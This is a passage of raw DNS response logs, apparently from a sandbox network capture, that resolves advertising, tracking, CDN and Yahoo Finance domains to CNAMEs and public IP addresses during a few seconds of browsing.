                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:20.626689911 CEST1.1.1.1192.168.2.40x7927No error (0)sb.scorecardresearch.com18.245.60.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:20.626689911 CEST1.1.1.1192.168.2.40x7927No error (0)sb.scorecardresearch.com18.245.60.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.143451929 CEST1.1.1.1192.168.2.40xec79No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.143767118 CEST1.1.1.1192.168.2.40x3047No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.296253920 CEST1.1.1.1192.168.2.40x9e9eNo error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.299227953 CEST1.1.1.1192.168.2.40x3451No error (0)query2.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.299854040 CEST1.1.1.1192.168.2.40x629eNo error (0)query2.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.299854040 CEST1.1.1.1192.168.2.40x629eNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.299854040 CEST1.1.1.1192.168.2.40x629eNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.302526951 CEST1.1.1.1192.168.2.40xb3d2No error (0)query1.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.302836895 CEST1.1.1.1192.168.2.40xf9cbNo error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.475112915 CEST1.1.1.1192.168.2.40xe0d5No error (0)query1.finance.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.475112915 CEST1.1.1.1192.168.2.40xe0d5No error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:21.475112915 CEST1.1.1.1192.168.2.40xe0d5No error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:22.203515053 CEST1.1.1.1192.168.2.40x63b5No error (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:22.204147100 CEST1.1.1.1192.168.2.40x8986No error (0)wnsrvbjmeprtfrnfx.ay.delivery172.67.149.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:22.204147100 CEST1.1.1.1192.168.2.40x8986No error (0)wnsrvbjmeprtfrnfx.ay.delivery104.21.41.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.367939949 CEST1.1.1.1192.168.2.40xee34No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368086100 CEST1.1.1.1192.168.2.40x511dNo error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368086100 CEST1.1.1.1192.168.2.40x511dNo error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368086100 CEST1.1.1.1192.168.2.40x511dNo error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368274927 CEST1.1.1.1192.168.2.40x350dNo error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368274927 CEST1.1.1.1192.168.2.40x350dNo error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368274927 CEST1.1.1.1192.168.2.40x350dNo error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368274927 CEST1.1.1.1192.168.2.40x350dNo error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368285894 CEST1.1.1.1192.168.2.40x4f9fNo error (0)ads.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368304014 CEST1.1.1.1192.168.2.40xa5caNo error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368376017 CEST1.1.1.1192.168.2.40x7095No error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368376017 CEST1.1.1.1192.168.2.40x7095No error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368376017 CEST1.1.1.1192.168.2.40x7095No error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368730068 CEST1.1.1.1192.168.2.40xdc38No error (0)ads.rubiconproject.comdigicertwc.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368866920 CEST1.1.1.1192.168.2.40x34c0No error (0)s.aolcdn.comcs629.wpc.lambdacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.368866920 CEST1.1.1.1192.168.2.40x34c0No error (0)cs629.wpc.lambdacdn.net192.229.221.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369205952 CEST1.1.1.1192.168.2.40xb4eeNo error (0)s.aolcdn.comcs629.wpc.lambdacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369345903 CEST1.1.1.1192.168.2.40x7c13No error (0)smarttag.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369591951 CEST1.1.1.1192.168.2.40x5e10No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369605064 CEST1.1.1.1192.168.2.40xe32No error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369636059 CEST1.1.1.1192.168.2.40xd707No error (0)pr-bh.ybp.yahoo.comds-pr-bh.ybp.gysm.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369636059 CEST1.1.1.1192.168.2.40xd707No error (0)ds-pr-bh.ybp.gysm.yahoodns.net54.75.18.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369636059 CEST1.1.1.1192.168.2.40xd707No error (0)ds-pr-bh.ybp.gysm.yahoodns.net52.30.164.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369636059 CEST1.1.1.1192.168.2.40xd707No error (0)ds-pr-bh.ybp.gysm.yahoodns.net52.51.171.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369636059 CEST1.1.1.1192.168.2.40xd707No error (0)ds-pr-bh.ybp.gysm.yahoodns.net99.81.213.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369645119 CEST1.1.1.1192.168.2.40xd8a8No error (0)smarttag.rubiconproject.comtagged-by.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.369724989 CEST1.1.1.1192.168.2.40xb95cNo error (0)eus.rubiconproject.comeus.rubiconproject.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.370680094 CEST1.1.1.1192.168.2.40xcf5No error (0)cm.g.doubleclick.net216.58.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.474801064 CEST1.1.1.1192.168.2.40xbdf2No error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.476006985 CEST1.1.1.1192.168.2.40x5f0aNo error (0)qsearch-a.akamaihd.netqsearch-a.akamaihd.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.480597019 CEST1.1.1.1192.168.2.40xcc5cNo error (0)ch-trc-events.taboola.comch-direct.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.480597019 CEST1.1.1.1192.168.2.40xcc5cNo error (0)ch-direct.taboola.comch-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.480597019 CEST1.1.1.1192.168.2.40xcc5cNo error (0)ch-vip001.taboola.com141.226.124.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.483975887 CEST1.1.1.1192.168.2.40x55b3No error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.483975887 CEST1.1.1.1192.168.2.40x55b3No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.483975887 CEST1.1.1.1192.168.2.40x55b3No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.483975887 CEST1.1.1.1192.168.2.40x55b3No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.483975887 CEST1.1.1.1192.168.2.40x55b3No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.487231970 CEST1.1.1.1192.168.2.40xc03dNo error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.487711906 CEST1.1.1.1192.168.2.40x4eb7No error (0)vidanalytics.taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.488193989 CEST1.1.1.1192.168.2.40xfb6fNo error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.488193989 CEST1.1.1.1192.168.2.40xfb6fNo error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.488193989 CEST1.1.1.1192.168.2.40xfb6fNo error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.489087105 CEST1.1.1.1192.168.2.40xbe7dNo error (0)sync-tm.everesttech.netsync.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.489087105 CEST1.1.1.1192.168.2.40xbe7dNo error (0)sync.tubemogul.comsyncf.tubemogul.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.489087105 CEST1.1.1.1192.168.2.40xbe7dNo error (0)syncf.tubemogul.comh2.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.490653992 CEST1.1.1.1192.168.2.40x3d78No error (0)static.criteo.netstatic.nl3.vip.prod.criteo.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.490653992 CEST1.1.1.1192.168.2.40x3d78No error (0)static.nl3.vip.prod.criteo.net178.250.1.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.516664028 CEST1.1.1.1192.168.2.40x5685No error (0)ch-trc-events.taboola.comch-direct.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:23.516664028 CEST1.1.1.1192.168.2.40x5685No error (0)ch-direct.taboola.comch-vip001.taboola.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.247663975 CEST1.1.1.1192.168.2.40x844fNo error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.247663975 CEST1.1.1.1192.168.2.40x844fNo error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.247663975 CEST1.1.1.1192.168.2.40x844fNo error (0)pugm-lhrc.pubmnet.com185.64.190.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.249052048 CEST1.1.1.1192.168.2.40xb8afNo error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.249052048 CEST1.1.1.1192.168.2.40xb8afNo error (0)image6v2.pubmnet.compugm-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.282604933 CEST1.1.1.1192.168.2.40x36e0No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.282604933 CEST1.1.1.1192.168.2.40x36e0No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.306283951 CEST1.1.1.1192.168.2.40xbd4cNo error (0)ad.turn.compresentation-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.306283951 CEST1.1.1.1192.168.2.40xbd4cNo error (0)presentation-ams1.turn.com46.228.164.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.306591034 CEST1.1.1.1192.168.2.40xe69cNo error (0)ad.turn.compresentation-ams1.turn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.412122965 CEST1.1.1.1192.168.2.40x3458No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.412122965 CEST1.1.1.1192.168.2.40x3458No error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.412122965 CEST1.1.1.1192.168.2.40x3458No error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.412122965 CEST1.1.1.1192.168.2.40x3458No error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.412122965 CEST1.1.1.1192.168.2.40x3458No error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.414248943 CEST1.1.1.1192.168.2.40x231aNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.601525068 CEST1.1.1.1192.168.2.40xa47eNo error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.601525068 CEST1.1.1.1192.168.2.40xa47eNo error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.601525068 CEST1.1.1.1192.168.2.40xa47eNo error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.601525068 CEST1.1.1.1192.168.2.40xa47eNo error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.611188889 CEST1.1.1.1192.168.2.40x341bNo error (0)pixel-eu.rubiconproject.compixel-eu.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.612107038 CEST1.1.1.1192.168.2.40x60No error (0)s.amazon-adsystem.com98.82.154.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.612118006 CEST1.1.1.1192.168.2.40x7999No error (0)wnsrvbjmeprtfrnfx.ay.delivery65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.614168882 CEST1.1.1.1192.168.2.40x2f4bNo error (0)wnsrvbjmeprtfrnfx.ay.delivery172.67.149.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.614168882 CEST1.1.1.1192.168.2.40x2f4bNo error (0)wnsrvbjmeprtfrnfx.ay.delivery104.21.41.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.614180088 CEST1.1.1.1192.168.2.40x9738No error (0)pixel-eu.rubiconproject.compixel-eu.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.625372887 CEST1.1.1.1192.168.2.40x5c6bNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.625372887 CEST1.1.1.1192.168.2.40x5c6bNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.626008987 CEST1.1.1.1192.168.2.40xf8dfNo error (0)px.ads.linkedin.comafd-lnkd.www.linkedin.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.626008987 CEST1.1.1.1192.168.2.40xf8dfNo error (0)afd-lnkd.www.linkedin.comwww-linkedin-com.l-0005.l-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.175.124.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.156.180.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.162.218.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.157.37.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.157.181.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.204.123.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.211.170.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629060984 CEST1.1.1.1192.168.2.40x2bf7No error (0)sync.srv.stackadapt.com54.152.127.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629790068 CEST1.1.1.1192.168.2.40xc320No error (0)image8.pubmatic.comimage8-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629790068 CEST1.1.1.1192.168.2.40xc320No error (0)image8-v2.pubmnet.comimgsync-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629956007 CEST1.1.1.1192.168.2.40xa0bdNo error (0)image8.pubmatic.comimage8-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629956007 CEST1.1.1.1192.168.2.40xa0bdNo error (0)image8-v2.pubmnet.comimagsync-lhrpairbc.pubmatic.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.629956007 CEST1.1.1.1192.168.2.40xa0bdNo error (0)imagsync-lhrpairbc.pubmatic.com185.64.191.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.809247971 CEST1.1.1.1192.168.2.40x10e6No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.809247971 CEST1.1.1.1192.168.2.40x10e6No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.809247971 CEST1.1.1.1192.168.2.40x10e6No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sep 30, 2024 19:21:24.809247971 CEST1.1.1.1192.168.2.40x10e6No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
